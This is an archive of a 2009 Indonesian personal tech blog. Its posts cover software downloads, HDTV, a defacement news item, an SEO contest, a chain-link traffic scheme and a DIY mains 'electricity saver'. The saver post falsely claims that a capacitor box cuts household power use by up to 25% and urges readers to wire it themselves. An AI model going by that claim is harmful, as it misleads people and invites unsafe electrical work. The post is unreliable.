Google Translate Client v3.1

Posted by Kopenx Blog on Wednesday, September 9, 2009

Anda Sudah tidak asing lagi bukan dengan google translate? berbagai bahasa bisa di terjemahkanya dengan cukup baik. tapi berapa lama waktu yang anda buang untuk membuka, copy paste pada google translate tersebut dalam satu hari?? tentunya jika anda sering menggunakan google translate ini pasti sangat membosankan. Nah, saya punya pendekatan yang lebih praktis untuk menterjemahkan jauh lebih cepat da memang cara konvensional ini sebaiknya anda tinggalkan saja karena sekarang sudah ada cara yang lebih mudah dan cepat yaitu menggunakan Google Translate Client versi 3.1.



Aplikasi Translate Client benar-benar akan memberikan kemudahan yang nyata bagi anda. dan kita tidak perlu lagi melakukan copy-paste secara menual karena sudah di sediakan fitur auto paste, dimana setiap anda melakukan block text yang akan di translate secara otomatis akan uncul ikon kecil G-icon dan untuk translatingnya anda cukup mengklik icon tersebut.

Untuk dukungan bahasa yang bisa di cakup oleh translate client ini sama seperti halnya google translate yang bisa mensupport lebih dari 40 bahasa yang berbeda mengingat aplikasi ini memang terhubung ke google translate. Untuk menggunakan software ini tentu saja anda harus terhubung dengan intenet.

Silakan anda coba dengan mendownloadnya terlebih dahulu di sini.
Selamat Mencoba :)
More aboutGoogle Translate Client v3.1

Memasang Tag Cloud Fitur Baru Pada Blogger

Posted by Kopenx Blog on Thursday, August 27, 2009

Pernahkan anda melihat tag yang seperti awan pada wordpress?? Nah, kini dengan fitur baru blogger anda bisa membuat tag cloud seperti awan tersebut. ini akan memudahkan anda untuk melihat postingan yang paling favorit sampai yang paling rendah rating postingan yang dibaca oleh pengunjung. yang selama ini tidak ada dalam fitur blogger.




Untuk mencoba fitur ini, rekan2 dapat langsung melihatnya pada widget masing2.

Nah setelah diaktifkan, label yang lebih populer muncul dalam font yang lebih besar daripada label yang kurang populer. Contohnya seperti yang ada pada sisi blog ini.

Seleksi pemilihan Umum. Eh salah, Label

Fasilitas lain yang terdapat dalam widget ini juga ditambahkan pada label yaitu kita dapat memilih dengan menyeleksi label mana saja yang ingin ditampilkan pada blog anda.



Menarik bukan :D menurut blogger, fitur ini adalah firur baru yang disediakan special untuk merayakan ulang tahun blogger yang ke 10. saya ucapkan Selamat ulang tahun buat blogger!

Selamat Mencoba :D
More aboutMemasang Tag Cloud Fitur Baru Pada Blogger

Mengenal Lebih Jauh Keunggulan HDTV

Posted by Kopenx Blog on Sunday, July 12, 2009

Selama ini kita sudah sangat familiar dengan sistem national television system committee (NTSC) yang dipergunakan televisi untuk menyajikan gambar. Tetapi, belakangan dengan munculnya teknologi high-definition television (HDTV) atau yang dalam bahasa Indonesia disebut televisi definisi tinggi, menyebabkan fungsi NTSC perlahan-lahan tergantikan. Apa sih sebenarnya teknologi HDTV ini?

PESATNYA kemajuan teknologi digital, terutama di bidang gambar digital yang mengkombinasikan foto dan video, memang tidak diduga sebelumnya. Kehadiran teknologi HDTV, bukan saja mendorong produk-produk dengan kualitas digital pada beberapa merek perangkat televisi yang sudah punya nama, tetapi juga pada cara perekamannya untuk ditayangkan di HDTV.

Sampai sekarang masih sulit untuk mendefinisikan secara tepat HDTV. Yang pasti, teknologi tayangan televisi yang dianggap terbaik sekarang ini adalah menggunakan sistem NTSC (National Television Systems Committee) yang menayangkan gambar analog, menghasilkan resolusi sebanyak 525 garis pada layar televisi. Sedangkan HDTV menghasilkan resolusi 1.125 garis tayangan yang lebih padat dan mampu menghasilkan informasi video lima kali lebih banyak dibanding sistem NTSC.

Namun, walaupun memiliki keunggulan yang luar biasa dalam menghasilkan resolusi yang rapat, tajam, dan jelas, transmisi HDTV memerlukan bandwith yang lebih besar sampai lima kali dibanding kapasitas sinyal televisi konvensional. Meski masih sulit mendefinisikannya, HDTV dapat diartikan sebagai suatu sistem media komunikasi bergambar dan atau bersuara dengan tingkat kualitas ketajaman gambar (resolusi) yang sangat tinggi (hampir sama dengan kualitas film 35 mm) dan kualitas suaranya juga menyerupai CD (Compact Disk).

Dalam hal ini teknologi pemrosesan sinyal digital dan displai memberikan peran yang sangat penting. Diharapkan juga nantinya bisa melayani multi bahasa dan multi media. Karena HDTV merupakan sistem komunikasi, maka seperti juga sistem komunikasi konvensional lainnya, untuk penyelenggaraannya memerlukan beberapa komponen dasar seperti pusat produksi (studio), pemroses/penyimpan, sistem transmisi dan pesawat penerima.
Konsep dasar HDTV di sisi lain sebenarnya tidak dimaksudkan hanya untuk meningkatkan definisi per wilayah unit tayangan layar televisi, tetapi juga untuk meningkatkan persentase bidang visual yang menayangkan gambar tersebut. Pengembangan HDTV diarahkan pada peningkatan 100 persen jumlah piksel horizontal dan vertikal, misalnya bingkai gambar 1 MB seharusnya memiliki jumlah 1.000 garis x 1.000 titik horizontal.

Hasil yang didapat dari perluasan ini adalah faktor perbaikan 2-3 kali dalam sudut bidang vertikal dan horizontal. Dengan demikian, perbaikan sudut ini pada HDTV juga mengubah rasio menjadi 16:9 dari 4:3 dan menjadi imej yang ditayangkan seperti di "bioskop". HDTV memang merupakan media komunikasi baru dan teknologinya sedang dalam proses penyempurnaan, terutama pada awal dekade 90-an.
Secara singkat sejarah perkembangan HDTV dimulai oleh Jepang yang dimotori oleh pusat riset dan pengembangan NHK (TVRI/RRI-nya Jepang) pada tahun 1968. Kemudian diikuti oleh masyarakat Eropa sebagai pembanding dan akhirnya Amerika Serikat menjadi kompetitor yang harus diperhitungkan.

Diperkirakan teknologi HDTV ini akan menjadi standar televisi masa depan, sehingga seorang peneliti senior dalam bidang sistem strategi dan manajemen Dr. Indu Singh meramalkan bahwa pasar dunia untuk HDTV ini akan mencapai 250 milyar dolar per tahun (tahun 2010).

Kompetisi Standar
Di samping aspek pasar yang menggiurkan, dalam sistem penyelenggaran HDTV mempunyai dampak yang luas pada bidang budaya, sosial, politik sampai pada pertahanan. Karena itu negara-negara maju telah berlomba agar sistem yang mereka kembangkan itu nantinya dapat dipakai sebagai standar dunia (global).
Standar yang telah masuk dalam agenda rapat CCIR (badan internasional yang menangani standarisasi sistem penyiaran), baru dua yaitu MUSE (Jepang) dan HD-MAC (Eropa). Sementara itu Amerika Serikat yang diatur oleh FCC (Komisi Komunikasi) sedang ditegangkan untuk memutuskan satu standar dari masing-masing team (konsorsium) yang sedang berkompetisi.

Karena kepentingan masing-masing negara yang berbeda-beda apakah CCIR bisa memutuskan pemakaian standar yang tunggal? Pengalaman dari sistem TV konvensional yaitu adanya PAL/SECAM di Eropa & ASEAN, NTSC di Amerika dan Jepang, rasanya sulit CCIR untuk bisa memutuskan pemakaian tunggal sistem penyiaran HDTV ini. Disamping itu juga ada badan standarisasi di bawah ISO yaitu MPEG yang menangani standarisasi pengkodean dan pemampatan sinyal gambar bergerak.

Setiap negara tentu saja menginginkan bahwa negaranya bisa maju dalam segala hal, termasuk teknologi HDTV. Bagi negara maju yang infrastruturnya sudah lengkap yang menjadi masalah penerapan adalah kompetisi. Namun demikian bagaimana dengan negara berkembang yang infrastrukturnya masih terbatas (lihat idealisasi sistem siaran di atas), apakah mau menciptakan standar sendiri ataukah mengikuti standar yang sedang dikembangkan oleh bangsa maju. apankah HDTV tersebut layak diterapkan?

Karena tingkatan teknologi HDTV yang ada sudah demikian maju, kemungkinan membuat standar sinyal sendiri hanyalah membuang waktu dan dana. Alangkah bijaksananya kalau negara berkembang bisa mempelajari sistem HDTV ini baik dari segi produksi, transmisinya, pesawat penerima bahkan sampai industri pembuatan komponen-komponen tersebut. Karena tanpa bisa memproduksi, negara tesebut akan selalu bergantung.
Sebagai contoh keterpaduan yang dilakukan di Jepang untuk pengembangan industri televisi yang dimulai dekade 50-an. Dengan dimotori oleh Pusat Riset dan Pengembangan NHK, Jepang memaksa industri-industri dalam negeri (Sony, Matsuhita, dll) untuk bisa memproduksi televisi dan komponen terkait dengan orientasi permulaan pasar dalam negeri.

Dengan dilaksanakan siaran secara langsung melalui media televisi upacara pernikahan kaisar (emperor) Akihito pada tahun 1959, meledaklah industri televisi di Jepang. Akhirnya seperti kita ketahui dengan baik bahwa Jepang telah bisa merajai teknologi televisi dan pasar dunia. Bahkan telah berhasil menayangkan program HDTV 8 jam sehari (mulai 25 Nopember 1991).
Contoh lain adalah Korea Selatan. Mereka tidak terburu-buru mengadakan penyelenggaraannya di saat standar belum mapan. Namun yang mereka kejar adalah bagaimana memproduksi HDTV untuk bisa di ekspor, sehingga mereka mengirimkan para ahli yang bisa membuat HDTV ke Jepang , Eropa dan Amerika. Kegiatan ini merupakan konsorsium dari pemerintah dan industri terkait seperti Golden Star, Samsung, Daewo, dan Korean Telecom. Proyek pengembangan produksi HDTV di Korea ini dimulai sejak tahun 1989, dengan biaya 100 milyar won, 60 persen di antaranya dikeluarkan dari kocek pemerintah.

Syarat Penyelenggaraan HDTV
Untuk dapat menyelenggarakan sistem siaran HDTV baik secara nasional maupun global yang ideal, diperlukan beberapa kriteria antara lain sebagai berikut:

1.Penggunaan sinyal standar yang sama (di dunia /dalam satu negara).
2.Biaya pesawat penerima yang murah /terbeli oleh khalayak umum.
3.Kompatibel dengan sistem yang sudah ada.
4.Bisa dihubungkan dengan media lain (multi-media).
5.Dapat terjangkau secara meluas (aspek pemerataan). (iah/berbagai sumber)
source : www.balipost.co.id

More aboutMengenal Lebih Jauh Keunggulan HDTV

Video Penampakan Hantu Michael Jackson

Posted by Kopenx Blog on Wednesday, July 8, 2009

Wartawan CNN ketika berada di rumah Almarhum Michael Jackson, kamera salah satu wartawan tidak sengaja menangkap bayangan aneh yang mirip Michael Jackson, Bayangan itu bergerak ke kiri dan ke kanan seperti orang yang mondar mandir, dan selanjutnya menghilang. Sebagian orang fans berat Mickael Jackson percaya bahwa penampakan bayangan itu adalah Michael Jackson...
Tapi sebagian orang lagi berpendapat bahwa bayangan yang mirip dengan Michael Jackson itu adalah rekayasa belaka. Anda mungkin sebagai penggemar Michael Jackson lebih percaya yang mana? :) Di bawah ini adalah video penampakan Michael Jackson. Jika anda mempunyai software download manager seperti IDM, maka anda dapat mendownloadnya langsung. :D


More aboutVideo Penampakan Hantu Michael Jackson

Acara Termehek-mehek Ketahuan Bohongi Penonton

Posted by Kopenx Blog on Tuesday, June 30, 2009

Siapa yang tak kenal acara termehek-mehek yang acaranya bikin kita was-was, harap-harap cemas dan kadang-kadang membuat kita terharu. acara yang disiarkan di salah satu televisi swasta ini (T*an* T*) ternyata sedikit menuai kontroversi dari Komisi Penyiaran Indonesia(KPI). Ini hanya sebagai info saja yang saya dapatkan dari sumber kapanlagi.com.

Program televisi Termehek-Mehek membohongi penonton, karena tidak seluruh tayangan berdasarkan realitas, kata Wakil Ketua Komisi Penyiaran Indonesia Pusat (KPI), Fetty Fajriati Misbach.

“Mereka bilang itu reality show, padahal bukan. Itu membohongi masyarakat,” kata dia usai sosialisasi hasil pemantauan KPI di Batam.

Menurut dia, tayangan Termehek-Mehek tidak sepenuhnya kisah nyata, karena telah dibumbui. Seharusnya, tim program Termehek-Mehek jujur dengan menyebut Termehek-Mehek sebagai drama reality, bukan reality show.

Selain itu, pemberitahuan di akhir acara yang kira-kira berbunyi: ‘Tayangan ini telah mendapatkan persetujuan semua pihak yang terlibat’, juga bukti pembohongan, kata Fetty.

“Dengan tulisan itu, seolah-olah ini tayangan nyata,” kata dia.

Di tempat yang sama, perwakilan Trans Coorporation, Panca, mengakui Termehek-Mehek tidak murni kisah nyata, melainkan drama reality.

“Dari awal, kita maunya drama reality, tapi AC Nielsen tidak memiliki genre itu,” kata dia.

Ia menduga pengkotakan reality show untuk Termehek-Mehek akan menjadi masalah. Sementara itu, Wakil Ketua KPI Daerah Kepulauan Riau, Aulia Indriaty, mengatakan perbedaan antara reality show dengan drama reality pada fakta.

“Reality show masuk dalam tayangan non fiksi. Sedangkan drama reality masuk pada fiksi,” kata dia.

Pada drama reality, kata dia, sebuah kenyataan bisa didramatisir sehingga menghibur. Sedangkan tayangan non fiksi harus murni kenyataan, tanpa rekayasa.

“Reality show tanpa skenario, drama reality dijalankan sesuai naskah,” kata dia. (dok. kapanlagi.com)

Bagaimana Menurut Anda? :)

More aboutAcara Termehek-mehek Ketahuan Bohongi Penonton

Kontes Mudah Berhadiah 25 Juta

Posted by Kopenx Blog on Friday, June 19, 2009


Kontes ini mungkin yang pertama dari jokosusilo.com dengan formulabisnisnya.Tidak tanggung-tanggung. total hadiahnya 25 juta + membership rahasiablogging.com. Syaratnya tergolong sangat mudah.

Ini dasar penjelasannya yang diambil langsung dari blog jokosusilo :


Latar Belakang

Begitu banyak rekan yang sedang berbisnis online (atau offline) kehilangan arah. Dan parahnya, mereka kehilangan daya karena terlalu banyak informasi dan rencana tanpa tindakan. Buaian impian menjadi sukses yang terlalu lama membuat mereka semakin terlena dalam lamunan. Mereka cenderung mencari kesempurnaan, mengabaikan cara-cara sederhana, dan terus saja mencari cara ajaib untuk mengubah nasibnya.

Mereka tidak sadar bahwa satu-satunya cara untuk menggapai sukses adalah dengan ACTION secara terarah dan konsisten. Itulah sebabnya, mengapa sering kita temui orang biasa bisa mendapatkan keberhasilan luar biasa walau hanya dengan amunisi sederhana.

Oleh karena itu, saya ingin menggalakkan kampanye “Stop DREAMING Start ACTION” dan menyebarkannya ke segala penjuru internet melalui KONTES SEO.

Tujuan Kontes

Kontes ini saya buat untuk menyadarkan diri saya, dan juga anda semua akan pentingnya ACTION. Pentingnya segera menyudahi mimpi yang tak bertepi, dan segera bertindak.

Melalui kontes ini, semakin banyak orang yang membahas pentingnya action dalam bisnis (atau dalam sisi kehidupan apapun juga), maka akan semakin banyak penjelajah maya yang membaca dan mendapatkan semangat besar untuk segera beraksi demi kemajuannya sendiri. Termasuk bagi para peserta kontes.

Harapan saya, ini akan membantu memberikan aura positif di dunia bisnis internet Indonesia dengan cara yang positif dan bersahabat.
Detail Lomba

Waktu Perlombaan:

Dimulai tanggal 20 Juni 2009, dan berakhir tanggal 15 September 2009 jam 9.00 WIB.

Tema Tulisan:

“Komitmen Stop Dreaming Start Action untuk masa depan yang lebih baik”.

Silakan tulis apa saja yang berkaitan dengan tema itu. Tulisan dianjurkan lebih bersifat motivasional, yang menggerakkan pembaca untuk bertindak. Boleh dalam bidang kehidupan apapun juga, misal bisnis, finansial, fisik, jiwa, sosial dsb.

Anda boleh tulis dari pendekatan manapun juga. Boleh dalam bentuk cerita, pengalaman, contoh, dan sebagainya. Gaya penulisan mau serius, humor, dll dipersilahkan, yang penting tujuannya tersampaikan. Kreativitas anda saya tantang di sini. Untuk bahan tulisan, silakan cari di Google.com. Anda akan temukan referensi melimpah di sana.

Target Kata kunci:

Stop Dreaming Start Action (tanpa tanda petik)

Juri:

Google.co.id, bukan Google.com

Pemenang: Top 10 Google Results.

Mereka yang menjadi pemenang adalah blog atau situs web yang berada pada posisi 1-10 halaman pertama google.co.id dengan kata kunci “Stop Dreaming Start Action” pada akhir masa perlombaan, yaitu tanggal 15 September 2009 jam 9.00 WIB.

Para pemenang akan diumumkan tanggal 16 September 2009 jam 9 pagi, melalui blog JokoSusilo.com. Tepat 4 hari sebelum lebaran. Buat pemenang, ini akan jadi bonus Hari Raya buat anda.

Hadiah:

Total hadiah sebesar Rp 25 juta, dengan komposisi sebagai berikut:

Pemenang 1: Rp 12.000.000,- + Free membership RahasiaBlogging.com
Pemenang 2: Rp 6.000.000,- + Free membership RahasiaBlogging.com
Pemenang 3: Rp 3.000.000,- + Free membership RahasiaBlogging.com
Pemenang 4: Rp 1.500.000,- + Free membership RahasiaBlogging.com
Pemenang 5: Rp 750.000,- + Free membership RahasiaBlogging.com
Pemenang 6: Rp 500.000,- + Free membership RahasiaBlogging.com
Pemenang 7: Rp 500.000,- + Free membership RahasiaBlogging.com
Pemenang 8: Rp 250.000,- + Free membership RahasiaBlogging.com
Pemenang 9: Rp 250.000,- + Free membership RahasiaBlogging.com
Pemenang 10: Rp 250.000,- + Free membership RahasiaBlogging.com

Cara kerja:

1. Lakukan pendaftaran terlebih dahulu disini. Anda akan memiliki akses ke Area Peserta.
2. Laporkan tulisan anda dengan memasukkan alamat URLnya melalui Area Peserta.
3. Pemenang akan diumumkan di blog dan di Area Peserta.

Ketentuan Utama:

* Konten harus memiliki makna sesuai tema, dan bukan hanya modifikasi keyword yang semata-mata untuk optimasi SEO saja.
* Konten harus mencantumkan nama Joko Susilo yang nge-link ke salah satu postingan blog JokoSusilo.com.

Ketentuan Umum:

* Kontes ini terbuka untuk para pemilik blog dan situs web di Indonesia.


* Hanya pemilik website dan blog pribadi (gratis atau dengan domain sendiri) yang boleh ikut. Website forum, iklan baris dan website publik lainnya (dimana konten diisi oleh pengunjung) tidak diperbolehkan ikut serta.

* Konten tidak boleh mengandung pornografi, isu SARA, hujatan, permusuhan, atau hal-hal yang tidak baik.

* URL dilarang menggunakan domain bertarget kata kunci. Hanya subdomain dan nama file yang boleh bertarget kata kunci.

* Peserta dilarang menggunakan metode Black Hat untuk mencapai ranking tinggi SEO.

* Dilarang mengcopy artikel peserta lain, atau keikutsertaannya akan digugurkan.

* Anda boleh menulis sebanyak-banyaknya, di berbagai website anda, tapi saat penilaian di Google.co.id, yang diambil hanya satu hasil teratas saja.

* Konten boleh diedit berulangkali untuk kepentingan SEO asal tidak mengubah esensi materi.

* Bila nanti hasil yang muncul di Google.co.id adalah website JokoSusilo.com, FormulaBisnis.com, RahasiaBlogging.com atau website lainnya milik Joko Susilo, maka itu tidak masuk hitungan dan pemenangnya adalah yang berada di posisi berikutnya.

* Bila nanti hasil yang muncul di Google.co.id adalah website publik (tidak diperbolehkan ikut), maka itu tidak masuk hitungan dan pemenangnya adalah yang berada di posisi berikutnya.

* Bila ada perubahan atau ketentuan tambahan, akan diinformasikan melalui blog JokoSusilo.com. Karena itu kunjungi terus blog JokoSusilo.com.

* Panitia berhak menyetujui/tidak keanggotaan peserta atau artikel tertentu berdasarkan peraturan yang ada.

untuk lebih jelasnya silakan klik disini



More aboutKontes Mudah Berhadiah 25 Juta

Heboh! Situs Dedi Corbuzier di Hack!

Posted by Kopenx Blog on Wednesday, June 3, 2009

Siapa yang tak kenal Master mentalis Deddy Corbuzier yang terkenal. kiprahnya di indonesia bisa membuat kita terkagum-kagum dengan aksi dan kontroversialnya. kali ini saya mendapati bahwa kalau situs
Deddi Corbuzier telah di defaced oleh sekelompok orang yang mengaku dari indonesia hacker community.

Di situs tersebut yang telah di defaced juga tertulis pesan untuk Deddy Corbuzier yang isinya sedikit membuat saya tertawa. 90kil!



"Jika anda seorang mentalis kami seorang defacer"

Anda bisa lihat sendiri situsnya. Bagaimana komentar anda?

More aboutHeboh! Situs Dedi Corbuzier di Hack!

Nonton TV Dunia Lewat Internet!

Posted by Kopenx Blog on Tuesday, June 2, 2009



Nonton TV Dunia Lewat Internet? Wow, Menarik Bukan! Software ini akan membuat anda bisa menonton TV internet secara legal akses ribuan saluran televisi dari seluruh dunia dan mengirimkannya ke komputer Anda melalui internet!

Sebenarnya banyak software seperti ini di internet salah satunya adalah PC Satelite TV ini.

Fitur utama :

• Film: Saluran TV komedi ... ... ... drama. dll

• Sports: baseball, sepak bola, sepak bola, bola basket, tenis, dan balap! Saluran seperti ESPN News, EuroSports TV, GameSports TV, WHL TV, Fox Network, dan Star Sport. Selain itu seni beladiri, wrestling, dan tinju juga ada!

• Musik: Saluran musik dari seluruh dunia! Beberapa saluran yang bisa anda nikmati adalah DeeJay TV, Festival TV, Ministry Of Sound, Party TV dan Club TV! Dan di atas itu, Anda juga memiliki akses ke lebih dari 1500 stasiun radio dari seluruh dunia!

• Premium Channel: Saluran, termasuk Comedy Central, MTV gir, Euro TV, Discovery Channel, Broadway Network, Game Network, Jaringan MovieStat, National Geographic, Food Network, rapture TV, Vintage Kartun, dan bahkan HDTV (televisi definisi tinggi ) Bisa anda nikmati pula! Ini adalah saluran Anda dapat membayar banyak uang untuk ... tapi sekarang tidak lagi harus!

• Anak Channel: saluran terbatas untuk anak-anak yang menampilkan film kartun dan sepanjang hari seluruh keluarga bisa menikmati!

• Pendidikan: Beberapa channel Anda harus memeriksa adalah TV edukasi tentang penelitian, The Academic Channel, Global Country, Strawberry TV dan The Baby Channel!

• Agama: Ada banyak program dari saluran disini seperti Jemaat Channel, Hope TV, Islam Channel, Kabbalah, Word Of God, dan Vatikan TV!

• Belanja: Anda dapat berbelanja dari seluruh dunia ... kanan dari couch! Saluran seperti Gems TV, Jewelry TV, Price Drop-TV, QVC, dan Speed Lelang!

• Berita, Cuaca Dan Politik: Ratusan channel dengan berita, cuaca dan politik dari seluruh negara dan dunia.



TV satelit untuk PC 2009 bisa dijalankan pada windows dan berbahasa inggris.


Selamat Menonton!

Download



More aboutNonton TV Dunia Lewat Internet!

Trik meningkatkan traffic dengan cepat dan alami

Posted by Kopenx Blog on Sunday, May 31, 2009

Rekan netter sekalian,

Ada sebuah filosofi yang mengatakan "Honesty is The Best Policy (Kejujuran adalah politik/strategi terbaik)" , akan kita buktikan bersama....apakah konsep kejujuran ini bisa kita olah menghasilkan traffic dan popularity yang lebih hebat dari konsep rumit para expert webmaster atau pakar SEO..?...

Saya yakin bisa asal konsep berikut ini di jalankan dengan benar...,bila ini di terapkan pada web atau blog anda sesuai ketentuan maka:

- Web anda akan kebanjiran traffic pengunjung secara luar biasa hari demi hari, tanpa perlu repot-repot memikirkan SEO atau capek-capek promosi keberbagai tempat di dunia internet.

- Web anda akan kebanjiran backlink secara luarbiasa hari demi hari, tanpa perlu repot-repot berburu link keberbagai tempat di dunia internet.

Jika Albert Einstein memakai persamaan e=mc2 untuk menggabungkan potensi masa dan kecepatan cahaya untuk menghasilkan energi nuklir yang luar biasa itu ,maka kita akan memakai persamaan T=v1+v2 untuk mnggabungkan potensi web saya dan web anda untuk menghasilkan traffic dan popularity yang luar biasa pula.

Jika Einstein menggunakan atom plutonium dan uranium untuk membuat bom nuklir, maka kita menggunakan Kejujuran dan ketepatan untuk membuat bom traffic dan popularity ini.

Di bawah ini adalah langkah-langkah yang perlu anda lakukan.
Jadi, mohon dibaca dengan seksama lalu terapkan dengan benar....!!

1. Buat posting artikel seperti posting saya ini, atau copy-paste posting ini dan juga diberi berjudul : T=v1+v2 ,Cara meningkatkan traffic dan popularity dengan cepat dan alami

2. Selanjutnya Copy atau buat KALIMAT SAKTI yang ada di bawah nomor 4 ini lalu pasang di web anda pada bagian yang paling mudah dilihat pengunjung, misalnya di bagian atas sidebar:

3. Pindahkan atau ganti link atau alamat url posting saya (disini-1) menggantikan alamat url rekan saya (disini-2).
-untuk mengetahui alamat url posting saya dan posting yang anda buat adalah bisa dengan meng-klik judul/title posting yang kita buat ini.

4. Lalu isi alamat url posting anda pada disini-1 tadi. Jadi anda melakukan publish (terbitkan) 2 kali, setelah posting ini selesai anda buat lalu di terbitkan, dan lalu anda klik pada title (judul) posting untuk mengambbil/meng-copy alamat url posting anda dari address bar browser anda, lalu anda edit lagi posting tadi dan masukan pada link disini-1 itu.

Berikut tulisan "KALIMAT SAKTI" yang perlu anda pasang di bagian web anda (setelah di ganti link url-nya sesuai ketentuan di atas)

"Ingin meningkatkan traffic pengunjung dan popularity web anda secara cepat dan tak terbatas...?...
Serahkan pada saya..., Saya akan melakukannya untuk anda GRATISSSS...!..Klik disini-1 dan disini-2"

-Jadi setelah KALIMAT SAKTI ini di letakan di web anda maka: jika pengunjung meg-klik link disini-1 akan menuju link posting anda, dan jika meng-klik disini-2 akan menuju link posting saya...dan seterusnya kan terus terjadi mata rantai yang tak terputus seperti itu...

-Di bawah ini ada 2 link :link anda (link web saya sekarang) dan link saya (link web rekan saya sekarang) . Maka ganti (alamatnya) "link anda" dengan "link url web anda" dan "link saya dengan link url web saya" (link rekan saya di hapus).

link anda : http://kopenx.blogspot.com/2009/05/trik-meningkatkan-traffic-dengan-cepat.html

link saya :
http://zonarejekiaira.blogspot.com/2009/03/trik-meningkatkan-traffic-dengan-cepat.html

5. Selesai, siapkan counter tracker dan pengecek link misalnya sitemeter dan technorati untuk melihat hasil banjir traffic dan linkback web anda.

Apa itu t=v1+t2...?
t : Jumlah traffic yang akan di peroleh web anda dalam suatu hari
v1 : Jumlah pengunjung web anda dalam suatu hari
v2: Jumlah pengunjung yang dimiliki v1 (pengunjung dari pengunjung web anda) dalam suatu hari.

Traffic:
Misalnya, web saya ini atau web anda dalam sehari memiliki rata-rata pengunjung 50 orang.., dan semuanya menerapkan konsep kita ini (KALIMAT SAKTI) dengan benar, dan dari 50 orang itu masing-masing memiliki 50 orang pula pengunjung dari blog-nya , maka web kita akan berpeluang di kunjungi 50 ditambah 50 x 50 orang pada hari itu = 2550 orang , dan akan berpeluang terus meningkat pula hari demi hari ,karena setiap hari selalu ada pengunjung baru di dunia internet, setiap hari juga ada blogger atau web baru di dunia internet...BUKTIKAN!!

Popularity:
Misalnya, web kita memiliki pengunjung 50 orang dalam suatu hari, dan semuannya menerapkan konsep ini , maka dalam hari itu web anda akan mendapatkan 100 linkback ke web anda, yaitu sebuah link pada KALIMAT SAKTI dan sebuah link pada link saya di kalikan 50. dan akan berpeluang meningkat terus hari demi hari....

Kenapa perlu di buat link link anda dan link saya pada posting...?
...hal ini untuk menjaga keabadian link kita, karena seperti kita tau link pada posting lebih kecil kemungkinannya terhapus....

Bisakah kita berbuat tidak fair atau tidak jujur menyabotase konsep ini, misalnya "menghilangkan semua link asal" lalu di isi dengan web/blog kita sendiri...? ....Bisa, dan konsep ini tidak akan menjadi maksimal untuk membuktikan Kejujuran adalah strategi/politik terbaik.....Tapi saya yakin bahwa kita semua tak ingin menjatuhkan kredibilitas diri sendiri dengan melakukan tindakan murahan seperti itu...

Semoga bermanfaat

http://Kopenx.blogspot.com

Source:
http://zonarejekiaira.blogspot.com

More aboutTrik meningkatkan traffic dengan cepat dan alami

Membuat sendiri alat penghemat listrik

Posted by Kopenx Blog on Monday, May 18, 2009

Pernahkah anda mendengar alat penghemat listrik?apakah benar ada alat penghemat listrik? jawabannya adalah Ya, ada! alat ini biasanya tersedia di toko elektronik tertentu saja dan harganya pun cukup menguras kantong anda. apalagi jika penjualnya adalah agen sales dimana produknya adalah berupa alat penghemat listrik yang di MLM-kan. Kali ini kita bisa membuat sendiri dengan harga yang jauh lebih murah...

Lalu bagaimana cara kerja alat penghemat listrik ini sampai bisa 'menghemat listrik' ?? apa sebenarnya yang di 'hemat'?? mungkin anda masih bingung tentang hal ini. intinya alat ini benar-benar bisa menghemat pemakaian listrik di rumah anda dari 10-25%. Cara kerja alat ini adalah hanya mengurangi besaran cosinus dari kurva arus AC yang akan terbaca pada alat ukur pengukur kilometer di rumah anda. Tahukan benda besar yang menempel di dinding luar rumah anda dan di atasnya seperti ada cakram yang berputar?? Nah, alat tersebut akan bekerja jika ada beban AC melintas melalui sensor berupa kumparan kawat untuk mengukur besarnya arus AC yang melewatinya. Atau teori ilmiahnya adalah bagaimana caranya agar kita bisa mereduksi sebesar mungkin puncak (peak dari besaran kurva AC (sinus-cosinus) agar terbaca sedemikian rendah.

Dalam dunia teknik elektro (karena saya adalah lulusan elektro), komponen yang berpengaruh terhadap arus AC adalah kondensator atau kapasitor dan lilitan atau induktor. yang dapat anda lakukan adalah mamfilter arus AC tersebut sebelum memasuki jaringan listrik di rumah anda. cara ini legal dan di perbolehkan oleh PLN sendiri karena kita sama sekali tidak akan mencuri sedikitpun listrik sebelum meteran penghitung arus yang menenpel di dinding luar rumah anda.

Lalu bagaimana cara membuatnya?? Buat seperti skema berikut ini...

Buat rangkaian di atas pada box plastik yang kuat dan pada. lebih baik dicor dengan gip's atau semen agar daya panasnya terbuang dengan baik. Selanjutnya hati-hati jangan ada kabel listrik yang kena terhadap kaleng tersebut atau anda akan tersengat listrik. lalu hanya kabel ground atau masa (jika ada) yang di hubingkan dengan kaleng. semakin dekat letak pemasangan alat dengan kilometer maka semakin optimal kinerjanya. kemudian gunakan kapasitor dengan kualitas yang bagus, yang lebih mahal lebih baik (harganya sekitar 30 ribuan). untuk SW adalah MCB yang berfungsi sebagai pengaman jika terjadi korsleting akibat kapasitor.

Rangkaian diatas sangat mudah dibuat. jadi tidak ada alasan untuk tidak membuatnya. sekalian belajar.. dan... buktikan sendiri khasiatnya, dengan pemakaain daya rutin yang relatif sama. anda bisa merasakan penghematan sekitar 25%.

Jika ada kesulitan atau ada yang ingin ditanyakan silakan share disini. Selamat Mencoba :D
More aboutMembuat sendiri alat penghemat listrik

Bikin Sendiri Banner Secara Instant? Gampang!!

Posted by Kopenx Blog on Sunday, April 26, 2009

Bagi anda yang terbiasa membuat banner dengan program-program grafis seperti adobe photoshop mungkin adalah hal yang biasa. tapi bagi orang orang yang ingin membuat banner secara instant dengan kualitas profesional, program berbasis "streaming" ini sangat membantu anda. Hasil banner dari program ini dapat dipakai untuk banner identitas anda, misalnya tukeran link atau untuk periklannan juga bisa. untuk mencoba membuat banner dengan instant. silakan kunjungi link ini dan anda bisa langsung berkreasi membuat banner sesuai dengan keinginan anda.

selamat mencoba!
Buat banner instant klik disini!

More aboutBikin Sendiri Banner Secara Instant? Gampang!!

Banyak cara menghasilkan uang dari internet

Posted by Kopenx Blog

Mungkin sebagian dari anda sudah tahu banyak mengenai bagaimana cara menghasilkan uang dari internet. Atau mungkin saat ini anda sudah merasakan betapa nikmatnya mendapatkan rupiah atau dolar hasil "keringat" dari internet. Tapi tidak sedikit juga dari sebagian dari kita terutama pemula yang baru terjun di dunia internet terutama yang berhubungan dengan internet marketing. Untuk itu mulai sekarang saya akan membahas sedikit banyak tentang internet marketing. Saya yakin banyak sekali yang lebih pintar mengenai hal ini. Tapi jika kita sama-sama belajar dan mengambil hal positif, maka diantara kita akan banyak yang menjadi ahli dalam bidang internet marketing ini. Lalu tipe bisnis apa yang bisa anda jalankan dalam mendulang uang dari internet ini??

